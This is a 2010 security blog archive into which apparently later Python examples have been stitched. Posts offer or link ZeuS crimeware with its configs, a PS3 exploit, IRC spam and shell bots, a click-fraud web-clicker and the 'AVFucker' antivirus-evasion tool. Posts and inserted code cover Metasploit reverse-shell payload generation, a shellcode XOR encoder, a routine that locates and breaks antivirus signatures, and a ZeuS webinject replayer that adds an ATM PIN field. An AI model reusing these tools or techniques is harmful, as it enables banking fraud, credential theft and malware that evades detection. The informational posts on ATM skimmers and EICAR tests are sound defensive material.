Sunday, January 31, 2010

Out Of Topic: iPad Laughter

My apologies for the second "out of topic" post, but a friend of mine emailed me these very funny images. I have no idea where he found them, but they really made me laugh, so I decided to write a quick post on these cartoons.



These images don't represent my own opinion: I neither agree nor disagree with them :D.

Saturday, January 30, 2010

Who Are You ?

Hey guys, this is an amazing flowchart describing your kind of life based on the question "Do you like money?".



Thursday, January 28, 2010

PS3, Good Job George.



You're right George, the idea is pretty easy, BUT the implementation .... WOW! I really enjoyed the way you hooked up the bus and injected junk bytes ... I know you've been working on this project for many years; you really deserve all the credit for this hack!

Now, for folks who don't know what I'm talking about, here is one of the best articles for understanding what he did, and here you can download the PS3 exploit. If you click on those links there will be ads and then RapidShare ... blah blah blah ... I know, you can find it just by googling, without ads and RapidShare. I keep my personal collection on RapidShare, and I really want to keep the original PS3 exploit by George, so I put it into my own collection. So if you want to download it through my pages, please be patient about that.

Tuesday, January 26, 2010

IRC Bots: a small collection

Hello folks, for a while now I have been receiving emails about IRC bots. Some people are interested in understanding how they work, others in how to write them... If you search on Google you will find tons of bots, but most of them are very complicated and hard to understand.
You'll probably need more powerful IRC bots eventually, but these Perl bots helped me a lot in understanding how to build my personal "home made" IRCBot. These scripts are pretty old (I came to this topic several years ago), but they still work fine today.

Everything starts from the basic IO::Socket library:

#!/usr/bin/perl -w
# First and Basic Example of IRC bot
# http://marcoramilli.blogspot.com
##################################
use strict;
use IO::Socket;

my $botnick      = $ARGV[0];
my $server       = $ARGV[1];
my $nickservpass = $ARGV[2];
my $user         = 'marcoramilli';

if (@ARGV < 2) {
    print STDOUT "Usage: $0 [nick] [server] [nickserv pass] -- if the nickname is not registered, leave it blank.\n";
    exit;
}

my $con = IO::Socket::INET->new(PeerAddr => $server,
                                PeerPort => '6667',   # change this if needed..
                                Proto    => 'tcp',
                                Timeout  => '30') or die "Error: Connection ($!)\n";

# registration: USER takes four parameters (user, mode, unused, realname),
# sending it with only one is rejected by most servers
print $con "USER $user 0 * :$user\r\n";
print $con "NICK $botnick\r\n";

while (my $answer = <$con>) {
    $answer =~ s/\r?\n$//;   # strip the CRLF line terminator

    ###################
    # add code here   #
    ###################

    if ($answer =~ m/^PING (.*)$/i) {
        print $con "PONG $1\r\n";   # replying to server pings keeps the connection alive
    }

    # 001 (RPL_WELCOME) means registration succeeded: only now identify and join,
    # anything sent earlier gets "451 You have not registered"
    if ($answer =~ m/^\S+ 001 /) {
        print $con "PRIVMSG NickServ :IDENTIFY $nickservpass\r\n" if @ARGV == 3;   # if $ARGV[2] exists..
        print $con "JOIN #channel\r\n";   # modify that ..
    }

    print STDOUT "$answer\n";   # printing $answer to the terminal..
}
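The same protocol logic in Python, as an added example that is not part of the original post or of the IRCBot collection it describes. It separates line parsing and command handling from the socket so the bot can be exercised offline, and it shows two things the Perl skeleton does not: JOIN only after the server's 001 welcome, and authorising a privileged command on the full nick!user@host mask rather than on the nick, which anyone can take. The server, channel name and owner mask are placeholders.

```python
import socket
import sys
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Message:
    prefix: Optional[str]   # "nick!user@host" or a server name; None when absent
    command: str            # "PRIVMSG", "PING", numeric replies such as "001", ...
    params: List[str]       # middle parameters, then the trailing parameter (if any) last


def parse_line(line: str) -> Message:
    """Split one raw IRC line into prefix / command / params (RFC 1459 framing)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:                              # the first " :" starts the trailing parameter
        line, _, trailing = line.partition(" :")
    parts = line.split()
    params = parts[1:]
    if trailing is not None:
        params.append(trailing)
    return Message(prefix, parts[0].upper(), params)


class Bot:
    """Protocol logic only: feed it server lines, it returns the lines to send back."""

    def __init__(self, nick: str, channel: str, owner_mask: str):
        self.nick = nick
        self.channel = channel
        self.owner_mask = owner_mask   # full nick!user@host: a bare nick is trivially spoofed

    def register(self) -> List[str]:
        # USER takes four parameters; sending it with one is a common first-bot bug
        return [f"NICK {self.nick}", f"USER {self.nick} 0 * :{self.nick}"]

    def handle(self, raw: str) -> List[str]:
        msg = parse_line(raw)
        if msg.command == "PING":                              # keep-alive: echo the token back
            return [f"PONG :{msg.params[-1]}"]
        if msg.command == "001":                               # RPL_WELCOME: registered, now JOIN
            return [f"JOIN {self.channel}"]
        if msg.command == "PRIVMSG" and len(msg.params) >= 2 and msg.params[0] == self.channel:
            text = msg.params[1]
            sender = msg.prefix.split("!", 1)[0] if msg.prefix else "?"
            if text.startswith("!echo "):
                return [f"PRIVMSG {self.channel} :{sender}: {text[6:]}"]
            if text == "!quit":                                # privileged: check the whole mask
                if msg.prefix == self.owner_mask:
                    return ["QUIT :bye"]
                return [f"PRIVMSG {self.channel} :{sender}: not allowed"]
        return []


def run(host: str, port: int, bot: Bot) -> None:
    """Network loop (not exercised offline): CRLF framing over a plain TCP socket."""
    with socket.create_connection((host, port), timeout=30) as sock:
        sock.settimeout(None)                                  # servers ping only every few minutes

        def send(lines: List[str]) -> None:
            for line in lines:
                sock.sendall((line + "\r\n").encode())

        send(bot.register())
        buf = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
            while b"\r\n" in buf:
                line, buf = buf.split(b"\r\n", 1)
                send(bot.handle(line.decode(errors="replace")))


if __name__ == "__main__":   # usage: python bot.py irc.example.net mynick  (placeholders)
    run(sys.argv[1], 6667, Bot(sys.argv[2], "#channel", "owner!user@example.invalid"))
```

Only `handle()` needs to be unit-tested: it is a pure function from one server line to the lines the bot answers with, so new commands can be added and checked without a server.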


I definitely suggest taking a look at my small but interesting IRCBot collection if you are interested in some basics of bot programming. You will probably want to reuse part of the code and/or mix it with your own. In the collection you'll find:


  1. Simple BOT (the code is shown above)
  2. Bot Sniffer
  3. IRC spam Bot
  4. MD5 cracker irc bot
  5. The Santa Bot
  6. Stealth ShellBot
  7. [ ... not really much more ... ]

Obviously everything is only for research purposes on socket programming and computer security. The bots must not be installed on systems whose owners are unaware of them; you may install the bots only on your own systems.


Have fun !

Sunday, January 24, 2010

Graphic User Interface On RoboAdmin

Hello folks,
we are really close to release a new version of RoboAdmin (http://roboadmin.sourceforge.net).


The next version will have a Graphic User Interface! This way it will not be so difficult to configure everything. A nice GUI will be set up to improve database management, with run and stop service buttons that avoid the annoying Java CLI. Unfortunately I discovered that some people are using RoboAdmin to manage evil botnets, and this is bad... RoboAdmin doesn't want to be used as a hacking tool; on the contrary, it wants to be a secure tool for system administrators.
As with everything in security, the risk of building something which could be used for bad purposes is very high: for instance, you can use nmap to monitor your own network or as the first step of an intrusion. Again, you can use Metasploit to check your own systems for vulnerabilities or to hack the Google network ... A lot of security tools can be used by a penetration tester or by an attacker in the same way. We are sorry about that, but it is not our responsibility if people use it as a hacking tool.

Thursday, January 21, 2010

Payloads Generator Never So Easy

Hi Folks, today I wanna talk about payloads.
Do you remember how difficult it was to obtain a good payload to write your own shellcode?
I remember these very useful links (1),(2),(3). At the beginning it was madness: pointers, assembly, decompilers and tools to remove null bytes... now everything is just EASY thanks to Metasploit (a link is useless, everybody knows where to get it).
So, let's generate a payload to embed in our source code.
  1. Select the payload that you like
  2. Configure it
  3. Generate the crafted payload
The above picture shows the configuration process, which basically means:
  • show payloads
  • use
  • set LHOST
Now comes the fun part. Using the generate command you can automatically generate the shellcode in your favourite language, such as Ruby, Perl, C or raw. Let's try to generate the payload for a Perl script. First select the payload that you like (I'm going to use the normal windows/shell/reverse_tcp), then configure it (i.e. set LHOST) and finally generate the payload using generate -t perl.



Here it is! Easy! :D
Now, let's imagine you want to encode your payload: generate -e is made for you. To show a list of available encoders just type show encoders and then use whichever you like. Again, thanks to Metasploit the complicated and time-consuming process of making payloads becomes easy and pretty intuitive. Good job!
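What generate -t and generate -e do conceptually, as an added Python example that is not Metasploit code: the bad-character check that used to be a manual step, the language-literal layout that generate -t produces (approximated), and a toy single-byte XOR encoder that picks a key whose output avoids the bad characters, which is the goal of generate -e (a real encoder also prepends a decoder stub, which is omitted here). The payload bytes are a constructed stand-in, not shellcode; in practice you would feed the output of generate -t raw.

```python
from typing import List, Optional, Tuple

SAMPLE = b"\x31\xc0\x50\x00\x68\x2f\x2f\x73\x68\x0a\xcc"   # constructed stand-in, NOT shellcode
BADCHARS = b"\x00\x0a\x0d"                                # typical set: NUL, LF, CR


def find_badchars(buf: bytes, bad: bytes = BADCHARS) -> List[Tuple[int, int]]:
    """(offset, byte) of every byte that breaks a C-string / line-based delivery."""
    return [(i, b) for i, b in enumerate(buf) if b in bad]


def format_payload(buf: bytes, fmt: str, width: int = 12) -> str:
    """Render the bytes as a string literal in the layout msfconsole's generate -t uses (approximated)."""
    chunks = [buf[i:i + width] for i in range(0, len(buf), width)]
    lits = ['"' + "".join(f"\\x{b:02x}" for b in c) + '"' for c in chunks]
    if fmt == "perl":
        return "my $buf =\n" + " .\n".join(lits) + ";"
    if fmt == "c":
        return "unsigned char buf[] =\n" + "\n".join(lits) + ";"
    if fmt == "python":
        return 'buf = b""\n' + "\n".join(f"buf += b{lit}" for lit in lits)
    if fmt == "raw":
        return buf.decode("latin-1")
    raise ValueError(f"unknown format {fmt!r}")


def xor_encode(buf: bytes, bad: bytes = BADCHARS) -> Optional[Tuple[int, bytes]]:
    """Pick a single-byte key whose output contains no bad chars; None if no key works."""
    for key in range(1, 256):
        if key in bad:                      # the decoder stub would have to carry the key too
            continue
        enc = bytes(b ^ key for b in buf)
        if not find_badchars(enc, bad):
            return key, enc
    return None


def xor_decode(key: int, enc: bytes) -> bytes:
    """What the decoder stub does at run time."""
    return bytes(b ^ key for b in enc)


if __name__ == "__main__":
    print("bad chars:", find_badchars(SAMPLE))
    print(format_payload(SAMPLE, "perl", width=4))
    key, enc = xor_encode(SAMPLE)
    print(f"key=0x{key:02x}", format_payload(enc, "c", width=4), sep="\n")
```

A single-byte XOR only works when some key clears every bad character at once; when it does not, real encoders fall back to multi-byte keys or additive feedback, which is why show encoders lists several.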

Tuesday, January 19, 2010

Proxy Checker

Some of you guys asked me if I have something to check the active proxies inside a generic ProxyList.txt (if you want to download the list, please read this: WEB-Clicker).

BTW, why don't you write some more comments on my blog instead of writing me tons of emails? Just kidding... emails are fine!

Of course I have it. Here it is.


#!/usr/bin/perl
############################################
# Proxy Checker
# http://marcoramilli.blogspot.com
############################################
use strict;
use warnings;
use WWW::Mechanize;

# one "ip:port" per line (the proxy list that ships with WEB-Clicker)
open(my $list, '<', 'proxy.lst') or die "cannot open proxy.lst: $!";
my @proxy = <$list>;
close($list);

foreach my $i (@proxy) {
    chomp($i);
    next if $i eq '';
    my ($ip, $port) = split /:/, $i, 2;
    print "$i -> ";

    # autocheck => 0: a dead proxy must not kill the whole run
    my $go = WWW::Mechanize->new(agent => "Mozilla/5.0", autocheck => 0, timeout => 15);
    $go->proxy(['http'], 'http://' . $i . '/');
    my $res = $go->get('http://www.whatismyip.com');

    # the echo page should report the proxy's address, not ours;
    # the "Your IP Is" marker is site-specific and may need updating
    if ($res->is_success && $go->content =~ m/Your IP Is \Q$ip\E/) {
        print "Ok.\n";
        open(my $log, '>>', 'proxy.log') or die "cannot open proxy.log: $!";
        print $log "$i\n";
        close($log);
    } else {
        print "Nop\n";
    }
}
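An added Python version of the same check, not the original Perl script, which goes one step further than "Ok/Nop": it classifies each proxy by what the IP-echo page sees through it, so transparent proxies (they relay, but the page still sees your real address) are separated from anonymous ones. The fetch function is injected, so the logic runs offline against constructed responses; the real fetcher below routes urllib through the proxy. It assumes the echo page contains the client IP somewhere in its body; the IP addresses in the sample responses are documentation ranges, not real proxies.

```python
import re
import urllib.request
from typing import Callable, Dict, List, Tuple

ECHO_URL = "http://www.whatismyip.com"   # assumption: the body contains the client IP the site saw
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
Fetcher = Callable[[str, int], str]      # (proxy host, proxy port) -> body of ECHO_URL via that proxy


def parse_proxy(line: str) -> Tuple[str, int]:
    """'host:port' -> (host, port); malformed entries are rejected, not handed to the HTTP client."""
    host, sep, port = line.strip().partition(":")
    if not host or not sep or not port.isdigit() or not 0 < int(port) < 65536:
        raise ValueError(f"bad proxy entry: {line!r}")
    return host, int(port)


def classify(host: str, port: int, my_ip: str, fetch: Fetcher) -> str:
    """dead / transparent (relays but leaks our IP) / anonymous (page sees the proxy) / other."""
    try:
        body = fetch(host, port)
    except Exception:                         # connect, timeout and HTTP errors all mean unusable
        return "dead"
    seen = IP_RE.findall(body)
    if not seen:
        return "dead"
    if my_ip in seen:                         # checked first: leaking our address is the worst case
        return "transparent"
    if host in seen:
        return "anonymous"
    return "other"                            # exit address differs from the proxy (chained / NAT)


def check_list(lines, my_ip: str, fetch: Fetcher) -> Dict[str, List[str]]:
    buckets: Dict[str, List[str]] = {k: [] for k in ("anonymous", "transparent", "other", "dead", "invalid")}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            host, port = parse_proxy(line)
        except ValueError:
            buckets["invalid"].append(line)
            continue
        buckets[classify(host, port, my_ip, fetch)].append(line)
    return buckets


def fetch_via_proxy(host: str, port: int, timeout: float = 15) -> str:
    """Real fetcher: route ECHO_URL through the HTTP proxy (network, not used in the offline test)."""
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": f"http://{host}:{port}"}))
    with opener.open(ECHO_URL, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":   # usage: python proxycheck.py proxy.lst <your public IP>
    import sys
    with open(sys.argv[1]) as f:
        result = check_list(f, sys.argv[2], fetch_via_proxy)
    for category, items in result.items():
        print(category, *items, sep="\n  ")
```

Only the "anonymous" bucket is worth keeping for the use the post describes; "transparent" entries are the ones that would quietly attribute every request to you.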





Sunday, January 17, 2010

WEB-Clicker + Proxy List


Today I received 5 emails asking about my personal WEB-Clicker.
First of all, let me explain why people are asking for my own WEB-Clicker when you can find a lot of them just by asking Google.




Most commercial and non-commercial WEB-Clickers use a simple HTTP GET (or POST) to obtain the page. Nowadays pay-per-click services use intelligent countermeasures against this attack by adding cookies and JavaScript to the page. Basically it is not enough to send a GET and wait for the response: the pay-per-click page needs some more computation (like a 3-way handshake). For these reasons normal WEB-Clickers won't work when run on pay-per-click pages. What is needed is a true, fully working browser able to execute JavaScript (and maybe Flash in the near future) and to store cookies.

v0.1 is the first alpha of my WEB-Clicker script, which is currently at v2.3. I cannot share the latest version, but I am sure you guys will appreciate this one. You can use it as the "first brick" of your own personal WEB-Clicker, modifying and integrating it as you like (please leave the initial comment with my blog in it). Version 0.1 has no GUI, works only with Firefox 3, and solves some common issues such as using different proxy servers, running multiple Firefox sessions at a time and building Firefox profiles at run time.

Ah, almost forgot ... The zip file (WEB-CLICKER_V0.1) contains the sources and a nice proxy list.

Here it is: WEB-CLICKER_V0.1

Saturday, January 16, 2010

Aurora: IE vulnerability used against google

The video below demonstrates how Google and the rest have been, according to most news reports, exploited via the "Aurora" vulnerability in Internet Explorer and had their "intellectual property" taken.

In the video you will see Metasploit set up a listening session, set up a web site that serves up the malicious code, and watch as an unsuspecting user visits the web site, triggers the attack that uses the IE vulnerability, and unknowingly opens a connection to a computer owned by the attacker. The attacker then lists the user’s processes, and elects to kill Notepad where the user was working on an important document. IE 6.0 is used, as this is the version Microsoft references as having been used in the “targeted attacks” on some 30+ U.S. companies.

A silly example for demonstration to be sure, but once the backdoor is open to the user’s PC the attacker can use it as a pivot point for other attacks against the internal network, escalate his or her privileges, take information off the PC, basically do anything the user can do.


The "Aurora" IE Exploit in Action

Here is the attack vector (click to enlarge):

Friday, January 15, 2010

ATM (in)Security.

Day after day, attacks on ATM machines become harder to detect.
At the beginning cloning devices were easy to recognise since they looked very different from the original machine's card reader. Now they look like the original ATM card readers (see the following scary pictures).







The wireless reader sits on top of the original one (bottom right of the picture). Same colour, same dimensions, same look overall. It has been forged for this particular brand. The phone at the top has an extra battery pack and reads the ATM cards over Bluetooth. It uses a simple Java application to email the card data and the PIN number to the attacker.

This is another example of a wireless cloned reader on a DIEBOLD ATM. Mounted, it looks like this:



Disassembled, it looks like this:

Front


Back


Please be aware that these attacks become more common day by day. If you see something weird on your usual ATM machine call 911; the risk is increasing a lot.

Tuesday, January 12, 2010

Reviewing Time


Hi Folks,
it's been about 6 days since I last wrote on my blog. I received some mails asking if I was OK! :D
Thank you guys, I am so impressed by that! This time of the year is review time for me. I have to review some articles and papers for magazines and conferences, and it takes a lot of time. I really enjoy being a reviewer for well-known magazines and conferences because it gives me the chance to read really new topics before all other readers. So, stay tuned, I'll be coming up with new interesting research topics.



Wednesday, January 6, 2010

ZeuS DIY Kit.

Hello folks,
this morning I found a ZeuS seller who offered it to me for "only 6000 dollars" :D (click the pic to make it readable).




Well, why should I buy it? I work all day long with malware! I really, really don't want to buy one!


BUT, since I remember from older versions that ZeuS was not very intuitive, I decided to publish this little post on it. This post won't be a tutorial or a ZeuS usage guideline; it might be useful to clarify what ZeuS is and how it works.

So, for everyone who doesn't know what ZeuS is:

ZeuS (also known as Zbot / WSNPoem) is a crimeware kit which steals credentials from various online services like social networks, online banking accounts, FTP accounts, email accounts and others (phishing). The web admin panel can be bought for $700 (source: RSA Security 4/21/2008) and the exe builder for $4,000 (source: Prevx 3/15/2009).


The crimeware kit contains the following modules:

1) A web interface to administrate and control the botnet (ZeuS Admin Panel) (see number 4, yellow)
2) A tool to create the trojan binaries and encrypt the config file (see number 2)
3) A configuration file (see number 1)
4) A binary file which contains the newest version of the ZeuS trojan (see number 3)
5) A webinjects file for advanced usage (phishing pages, see number 5)






To properly use the DIY toolkit the tester needs to configure the config file, which will be loaded and encrypted into a bin file.
There aren't many examples around, so I decided to discuss it a little bit more. The file is divided into two main sections:
1) Static Configuration. The static configuration describes the actions that ZeuS performs directly on the PC, without injecting anything or interfering with the user. These actions can be: stealing stored passwords, stealing cached information, visited websites, emails, chat conversations and so on. Inside the static configuration the tester finds "url_config". This entry is really important: through it the tester may change the bot configuration dynamically by changing the file at that location. Basically the bot fetches it during its boot phase.



2) Dynamic Configuration. The dynamic configuration describes the actions that ZeuS performs while interacting with the user. Examples of dynamic configuration could be: automatically downloading and executing files, injecting fake Bank of America pages to steal credentials, or using common man-in-the-middle techniques to inject dynamic content. ZeuS needs the URL of the loader and the URL of the server where traffic is redirected and from which it downloads itself. The file_webinjects entry is the main file of the dynamic configuration. Basically the tester tells the system where the "important" information is. This configuration file is "platform dependent", meaning that it depends on which web page you want to target. (Don't worry, I'll give you some real examples at the end of the post.)



The tester may want to add an "advanced" (in the sense of different) configuration file to the same bot (underlined in green in the previous image). An example of a webinjects file is the following. As first parameter the tester has to define which URL is going to be analysed, then he needs to mark where the sensitive information is by injecting fake content.




Real configuration files are more complicated. There are more "entries", for example:
1) "WebFilters" . To filters some urls. Example: ”*.fedbank.com/*”
2) "WebDataFilters". To look for some data inside the parameters. Example : "gmail.google.com/*" "passw;login"
3) "WebFakes". To force the user onto a phished page. Example: "https://sitekey.bankofamerica.com/sas/signon.do" "http://XXX.YYY.ZZZ.HHH/zu/fk/US/bofa.php" "P" USpass=*" ""
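For analysts who pull a decrypted config and want to know exactly what it does to a given page, here is an added Python example (not ZeuS code, and not from the post's config archives) that parses the webinjects text format described above: a set_url line with a URL pattern and flags, followed by data_before, data_inject and data_after blocks, each closed by data_end, with * as the only wildcard. A second function replays one inject against a form the way the bot's browser hook would, so the injected field is visible in the resulting HTML. The config and HTML below are constructed samples and examplebank.invalid is not a real site; empty data_before blocks and the per-flag behaviour (G/P/L) are not modelled.

```python
import re
from typing import List

SECTIONS = ("data_before", "data_inject", "data_after")

# constructed sample in the webinjects syntax: one target, one injected field
SAMPLE_WEBINJECTS = """\
set_url https://www.examplebank.invalid/login* GP
data_before
name="password"*>
data_end
data_inject
<br>ATM PIN: <input type="text" name="atm_pin">
data_end
data_after
data_end
"""

# constructed login form the inject is aimed at
SAMPLE_HTML = ('<form action="/login" method="post">'
               '<input type="text" name="user"><input type="password" name="password">'
               '</form>')


def parse_webinjects(text: str) -> List[dict]:
    """One dict per set_url block: url, flags (the token after the URL, e.g. GP) and the three data sections."""
    entries: List[dict] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("set_url"):
            parts = line.split()
            cur = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                   "data_before": [], "data_inject": [], "data_after": []}
            entries.append(cur)
            section = None
        elif line in SECTIONS:
            section = line
        elif line == "data_end":
            section = None
        elif section is not None and cur is not None:
            cur[section].append(raw)                 # keep the line as written, markup included
    for entry in entries:
        for name in SECTIONS:
            entry[name] = "\n".join(entry[name])
    return entries


def wildcard(pattern: str) -> str:
    """ZeuS patterns treat '*' as 'anything' and every other character literally."""
    return ".*?".join(re.escape(piece) for piece in pattern.split("*"))


def url_matches(pattern: str, url: str) -> bool:
    return re.fullmatch(wildcard(pattern), url, re.S) is not None


def apply_injects(html: str, url: str, entries: List[dict]) -> str:
    """Insert data_inject right after the first data_before match, provided data_after (if given)
    also occurs later in the page. Entries whose URL pattern does not match the page are ignored."""
    for entry in entries:
        if not url_matches(entry["url"], url) or not entry["data_before"]:
            continue
        m = re.search(wildcard(entry["data_before"]), html, re.S)
        if m is None:
            continue
        if entry["data_after"] and not re.search(wildcard(entry["data_after"]), html[m.end():], re.S):
            continue
        html = html[:m.end()] + entry["data_inject"] + html[m.end():]
    return html


if __name__ == "__main__":
    injects = parse_webinjects(SAMPLE_WEBINJECTS)
    for e in injects:
        print(e["url"], e["flags"], "before:", e["data_before"])
    print(apply_injects(SAMPLE_HTML, "https://www.examplebank.invalid/login.php", injects))
```

The useful by-products for incident response are the url list (which institutions a sample targets) and the data_inject bodies (what extra fields victims were asked for), both of which come straight out of `parse_webinjects` without replaying anything.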

To check out the full configuration files: webinjects.txt.zip and config2.txt.zip
The ZeuS version 1.0.3.7, From RapidShare here .

Monday, January 4, 2010

More on EICAR


Hi folks, today I want to show these two easy experiments made using the new version of the "Quick'n Dirty" EICAR-GTUBE-Generator 0.1. I know the EICAR file is only a test file and it is not supposed to be recognised inside other files, BUT for some reason some AVs do that. Analysing this file we can analyse the AV's detection chain (as already explained in some past posts) and maybe find some gaps.

Exp 1. Hiding EICAR file in the JPG header



Most AVs (but not all...) detect the EICAR file even when it is embedded in the JPG header. Some major AV companies like Avast, McAfee and Microsoft don't (why can't they detect it?).

Exp 2. Hiding EICAR file in the JPG tail



Surprisingly, only two AV companies detect it. My compliments to Authentium and F-Prot. So why can Authentium and F-Prot detect EICAR even when it is hidden in the JPG's tail while the other AV companies cannot? What's the difference in their detection chains?

I'll ask these people directly this week; I'll be back with some answers... hopefully.
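One plausible explanation for the difference between the two experiments, as an added Python example that is not the author's EICAR-GTUBE-Generator: it builds both test files in memory (EICAR inside a JPEG COM segment vs. appended after the EOI marker) and runs two toy scanners over them. A scanner that trusts the container format walks the marker segments and stops at EOI, so it finds the header copy and never sees the tail; a format-agnostic scanner pattern-matches the whole file and finds both. The JPEG is a minimal constructed skeleton (no scan data, not a viewable picture), the test string is assembled at run time so this source file is not itself flagged, and nothing is written to disk.

```python
import struct
from typing import Dict, List, Tuple

# the standard 68-byte test string, split in two so the source file itself does not match
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$" + b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

SOI, EOI = b"\xff\xd8", b"\xff\xd9"
COM, APP0 = b"\xff\xfe", b"\xff\xe0"


def segment(marker: bytes, payload: bytes) -> bytes:
    """Marker + 2-byte big-endian length (the length field counts itself) + payload."""
    return marker + struct.pack(">H", len(payload) + 2) + payload


# minimal APP0/JFIF header, constructed: enough structure for a parser, not a decodable image
JFIF = segment(APP0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")


def eicar_in_header() -> bytes:
    """Experiment 1: EICAR carried as a COM (comment) segment inside the JPEG structure."""
    return SOI + segment(COM, EICAR) + JFIF + EOI


def eicar_in_tail() -> bytes:
    """Experiment 2: EICAR appended after the EOI marker, outside the JPEG structure."""
    return SOI + JFIF + EOI + EICAR


def jpeg_segments(data: bytes) -> Tuple[List[Tuple[int, bytes]], bytes]:
    """Walk the length-delimited marker segments up to EOI; return (segments, bytes after EOI).
    Toy parser: it does not handle SOS/entropy-coded data, which a real one must."""
    if data[:2] != SOI:
        raise ValueError("not a JPEG")
    pos, segs = 2, []
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                          # EOI: the image ends here, whatever follows
            return segs, data[pos + 2:]
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        segs.append((marker, data[pos + 4:pos + 2 + length]))
        pos += 2 + length
    return segs, b""


def scan_structured(data: bytes) -> bool:
    """Scanner that trusts the format: inspects segment payloads and stops at EOI."""
    segs, _ = jpeg_segments(data)
    return any(EICAR in payload for _, payload in segs)


def scan_flat(data: bytes) -> bool:
    """Format-agnostic scanner: matches over every byte, so trailing data is covered too."""
    return EICAR in data


def compare(data: bytes) -> Dict[str, bool]:
    return {"structured": scan_structured(data), "flat": scan_flat(data)}


if __name__ == "__main__":
    print("header:", compare(eicar_in_header()))
    print("tail:  ", compare(eicar_in_tail()))
```

Whether a given product behaves like `scan_structured` or `scan_flat` on image files is exactly the detection-chain question the post raises; the same split shows up with any container whose parser defines where the "file" ends.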

Saturday, January 2, 2010

AVFucker New Version

Hi Folks,
in the past two days I received a lot of comments on my pretty old AVFucker tool. It is a little project written some years ago for an "underground community" to fuck AVs using the "replace byte signature" technique. Some people would like to see this software in a multi-platform version and not only as a Windows-dependent executable (wow... it must be very old... I haven't written anything for Windows in years, really). Well, I don't know why they need it in a platform-independent language: the (pretty old) "replace byte signature" technique works only on Windows PE files... so why a platform-independent program for changing PE files? Anyway, since there are plenty of requests, I don't mind: here is the link to the new AVFucker written in Java. :D




The interface is pretty much the same, 4 steps as usual.
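The idea behind the "replace byte signature" technique, as an added Python example that is not AVFucker's code: overwrite regions of the file, rescan, and narrow down the byte range the detector actually keys on, then change one byte inside it. The detector here is a toy that matches a fixed byte string in a constructed sample, standing in for "run the AV over the file"; with a real scanner the `detect` callback would invoke it on a temporary copy. It assumes the signature's first and last bytes differ from the filler byte, which is why tools of this kind let you choose the filler.

```python
from typing import Callable, Optional, Tuple

Detector = Callable[[bytes], bool]

# constructed stand-ins: a byte pattern the toy scanner keys on, planted among filler bytes
SIGNATURE = b"\xe8\x00\x00\x00\x00\x5b\x81\xeb"
SAMPLE = bytes(range(256)) + b"\x90" * 100 + SIGNATURE + b"\x90" * 300 + bytes(range(256))


def toy_scanner(data: bytes) -> bool:
    """Stands in for the AV: a pure contiguous byte-pattern match."""
    return SIGNATURE in data


def _overwrite(data: bytes, lo: int, hi: int, filler: bytes) -> bytes:
    return data[:lo] + filler * (hi - lo) + data[hi:]


def locate_signature(data: bytes, detect: Detector, filler: bytes = b"\x00") -> Optional[Tuple[int, int]]:
    """Return the [start, end) range the detector depends on, found with two binary searches:
    overwrite a growing prefix until detection stops (first signature byte), then a shrinking
    suffix until detection resumes (last signature byte). Each probe is one scan."""
    n = len(data)
    if not detect(data) or detect(_overwrite(data, 0, n, filler)):
        return None                       # nothing detected, or detection not tied to these bytes
    lo, hi = 0, n                         # prefix [0,lo) wiped: still detected; [0,hi) wiped: not
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if detect(_overwrite(data, 0, mid, filler)):
            lo = mid
        else:
            hi = mid
    start = hi - 1
    lo, hi = 0, n                         # suffix [lo,n) wiped: not detected; [hi,n) wiped: detected
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if detect(_overwrite(data, mid, n, filler)):
            hi = mid
        else:
            lo = mid
    end = lo + 1
    return start, end


def flip_one_byte(data: bytes, rng: Tuple[int, int]) -> bytes:
    """The 'replace byte' step: change a single byte inside the located range."""
    i = rng[0]
    return data[:i] + bytes([data[i] ^ 0xFF]) + data[i + 1:]


if __name__ == "__main__":
    rng = locate_signature(SAMPLE, toy_scanner)
    print("signature range:", rng, SAMPLE[rng[0]:rng[1]].hex())
    print("still detected after one-byte change:", toy_scanner(flip_one_byte(SAMPLE, rng)))
```

Two binary searches cost about 2·log2(size) scans, which is why this works interactively even against a slow scanner; the flip side, and the reason the technique is old, is that it says nothing about heuristics or emulation, which do not key on one contiguous range.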

Friday, January 1, 2010

The Cult of Done Manifesto

A very good friend of mine today pointed me to this nice cult: "the cult of done".

The Cult of Done Manifesto by Bre Pettis and Kio Stark. They wrote it in 20 minutes, “because we only had 20 minutes to get it done.”

Here it is :

1) There are three states of being. Not knowing, action and completion.
2) Accept that everything is a draft. It helps to get it done.
3) There is no editing stage.
4) Pretending you know what you’re doing is almost the same as knowing what you are doing, so just accept that you know what you’re doing even if you don’t and do it.
5) Banish procrastination. If you wait more than a week to get an idea done, abandon it.
6) The point of being done is not to finish but to get other things done.
7) Once you’re done you can throw it away.
8) Laugh at perfection. It’s boring and keeps you from being done.
9) People without dirty hands are wrong. Doing something makes you right.
10) Failure counts as done. So do mistakes.
11) Destruction is a variant of done.
12) If you have an idea and publish it on the internet, that counts as a ghost of done.
13) Done is the engine of more.



Here is the second amazing manifesto (source PSD file), and here the previous high-resolution file.